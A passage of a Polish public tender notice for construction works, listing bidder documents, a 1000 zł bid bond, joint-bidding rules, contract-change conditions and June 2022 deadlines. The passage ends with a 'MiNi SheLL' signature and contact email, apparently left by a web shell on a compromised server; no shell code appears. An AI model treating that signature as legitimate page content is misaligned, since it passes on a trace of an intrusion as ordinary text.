są:<br/>a) referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane.<br/>b) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia lub referencji, o których mowa w ppkt. a),<br/>Jeżeli Wykonawca nie jest w stanie uzyskać poświadczenia – musi podać i uzasadnić przyczyny braku możliwości przedłożenia poświadczenia oraz wykazać, że są to przyczyny obiektywne, czyli niezależne od Wykonawcy. Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa wyżej – w przypadku gdy Zamawiający jest podmiotem, na rzecz którego zostały wykonane usługi wskazane w wykazie.<br/>2. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowania robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, oraz informacją o podstawie do dysponowania tymi osobami. / załącznik nr 8 do SWZ/ Jeżeli pełniona funkcja tego wymaga należy najpóźniej w dniu podpisania umowy przedstawić kopię posiadanych uprawnień dla osób wyszczególnionych w załączniku 8 zgodnie z pkt 1.3.2 Dział XV SWZ (kierownik budowy).<br/>3. Informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych w kwocie nie mniejszej niż 100 000,00 zł lub zdolność kredytową Wykonawcy w wysokości nie mniejszej niż 100 000,00 zł wystawionych nie wcześniej niż 3 miesiące przed jej złożeniem.<br/>4. Opłaconą polisę lub dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę min. 200 000,00 zł ważną minimum na czas związania z ofertą.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty należy dołączyć:1.1. W celu potwierdzenia, że osoba działająca w imieniu<br/>Wykonawcy jest umocowana do jegoreprezentowania - odpis lub informację z Krajowego<br/>Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru;1.2. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do<br/>jegoreprezentowania nie wynika z dokumentów, o których mowa w pkt 1.1. -pełnomocnictwo lub<br/>inny<br/>dokument (np. akt powołania na stanowisko prezesa zarządu, członka zarządu spółki lub, w<br/>przypadku spółek działających w systemie common law, członka rady dyrektorów spółki, a także<br/>umowa spółki cywilnej lub uchwała jej wspólników, wskazująca jednego ze wspólników jako<br/>umocowanego do reprezentacji spółki) potwierdzający umocowanie do reprezentowania<br/>Wykonawcy;1.3. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych<br/>przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;1.4. Oświadczenie<br/>Wykonawcy o niepodleganiu wykluczeniu z postępowania o udzielenieZamówienia oraz o<br/>spełnienie warunków udziału w postepowaniu - oświadczenie Załącznik nr 5 do SWZ.W<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o<br/>niepoleganiu wykluczeniu oraz o spełnieniu warunków udziału w postępowaniu składa każdy z<br/>Wykonawców.;W przypadku powoływania się na zasoby podmiotu trzeciego Wykonawca, w przypadku polegania na zdolnościach technicznych lub podmiotów udostępniających zasoby,<br/>przedstawia wraz z oświadczeniem, o którym wyżej mowa, także oświadczenie podmiotu<br/>udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca<br/>powołuje się na jego zasoby (załącznik nr 5a do SWZ).1.5. Zobowiązanie podmiotu<br/>udostępniającego Wykonawcy zasoby, do oddania do dyspozycji Wykonawcy niezbędnych<br/>zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów (o ile Wykonawca korzysta ze zdolności innych podmiotów na<br/>zasadach określonych w art. 118 ustawy).Zobowiązanie lub inny podmiotowy środek dowodowy<br/>w opisywanym zakresie, przekazuje się w postaci elektronicznej, i opatruje kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku, gdy<br/>zobowiązanie (inny podmiotowy środek dowodowy) zostało wystawione w postaci papierowej i<br/>opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu,<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci<br/>papierowej. 1.6. Dowód wpłaty wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 1000,00 zł.2. Wadium<br/>winno być wniesione przed upływem terminu składania ofert w następujących formach, w<br/>zależności od wyboru Wykonawcy:a. pieniądzu, przelewem na rachunek bankowy w: BGŻ SA<br/>Opole nr 40 2030 0045 1110 0000 0398 8510; w taki sposób, aby znalazły się na rachunku<br/>Zamawiającego przed upływem terminu składania ofert.b. gwarancjach bankowych;c.<br/>gwarancjach ubezpieczeniowych;d. poręczeniach udzielanych przez podmioty, o których mowa<br/>w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz.U. z 2019r. poz. 310, 836 i 1572).3. Wadium wnosi się przed upływem<br/>terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z<br/>wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. Ustawy PZP4.<br/>Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem<br/>okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na<br/>przedłużony okres związania ofertą.5. Jeżeli wadium jest wnoszone w formie gwarancji lub<br/>poręczenia, o których mowa w ust. 2 pkt b-d, wykonawca przekazuje zamawiającemu oryginał<br/>gwarancji lub poręczenia, w postaci elektronicznej.6. Zamawiający zwraca wadium<br/>niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą; 2) zawarcia umowy w sprawie zamówienia publicznego; 3)<br/>unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego<br/>wniesienia.7. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>złożenia wniosku zwraca wadium wykonawcy: 1) który wycofał ofertę przed upływem terminu<br/>składania ofert; 2) którego oferta została odrzucona;3) po wyborze najkorzystniejszej oferty, z<br/>wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza; 4) po<br/>unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia.8. Złożenie wniosku o zwrot<br/>wadium, o którym mowa w ust. 2, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz<br/>z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w<br/>dziale IX. Ustawy PZP9. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia2. W takim przypadku,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie o niepoleganiu wykluczeniu oraz o spełnieniu warunków udziału w postępowaniu<br/>składa każdy z Wykonawców 4. W odniesieniu do warunków dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony ustalają, iż zmiany do Umowy będą dokonywane zgodnie z przepisami ustawy Kodeks<br/>Cywilny, jeżeli PZP nie stanowią inaczej 2. Strony dopuszczają możliwość zmiany terminu<br/>zakończenia robót, o okres trwaniaprzyczyn, z powodu których będzie zagrożone dotrzymanie<br/>terminu zakończenia robót, w następujących sytuacjach:1) jeżeli przyczyny, z powodu których<br/>będzie zagrożone dotrzymanie terminu zakończenia robót będą następstwem okoliczności, za<br/>które odpowiedzialność ponosi Zamawiający, 2) gdy wystąpią niekorzystne warunki<br/>atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności z powodu<br/>technologii realizacji prac określonej w normach – tj. silne opady deszczu powodujące powódź<br/>lub podtopienia na placu budowy, silne wiatry sięgające w porywach powyżej 30m/s3)<br/>gdywystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do<br/>wykonania<br/>przedmiotu Umowy ze względu na zasady wiedzy technicznej oraz udzielenia zamówień<br/>dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu Umowy, wystąpienia<br/>niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty<br/>inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,4) wystąpią<br/>opóźnienia w dokonaniu przez właściwe organy administracji państwowej określonych czynności<br/>5) gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których<br/>właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres,<br/>przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są<br/>następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,6) jeżeli wystąpi brak<br/>możliwości wykonywania robót z powodu nie dopuszczania do ich wykonywania przez<br/>uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,7) wystąpienia Siły wyższej uniemożliwiającej wykonanie<br/>przedmiotu Umowy zgodnie z jej postanowieniami.3. Wykonawca jest uprawniony do żądania<br/>zmiany Umowy (jeżeli zakres ten został ujęty w umowie) w zakresie materiałów, parametrów<br/>technicznych, technologii wyk. robót bud., sposobu i zakresu wykonania przedmiotu Umowy w<br/>następujących sytuacjach:1) konieczności zrealizowania jakiejkolwiek części robót, objętej<br/>przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub<br/>technologicznych, niż wskazane w Dokumentacji projektowej, a wynikających ze stwierdzonych<br/>Wad tej Dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby<br/>zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem<br/>przedmiotu Umowy,2) konieczności realizacji robót wynikających z wprowadzenia w<br/>Dokumentacji projektowej zmian uznanych za nieistotne odstępstwo od projektu budowlanego,<br/>wynikających z art. 36a ust. 1 ustawy – Prawo Budowlane niemożliwych do przewidzenia na<br/>etapie sporządzania oferty,3) wystąpienia warunków geologicznych, geot. lub<br/>hydrolog.odbiegających w sposób istotny od przyjętych w Dok. proj., rozpoznania terenu w<br/>zakresie znalezisk archeologicznych, występowania niewybuchów lub niewypałów, które mogą<br/>skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem<br/>przedmiotu Umowy,4) wystąpienia warunków Terenu budowy odbiegających w sposób istotny<br/>od przyjętych w Dok. proj., w szczególności napotkania niezinwentaryzowanych lub błędnie<br/>zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych,5) konieczności<br/>zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub<br/>materiałowych ze względu na zmiany obowiązującego prawa,6) wystąpienia niebezpieczeństwa<br/>kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w<br/>zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,7) wystąpienia Siły wyższej<br/>uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy przetargowej JOSEPHINE dostępnej na stronie https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com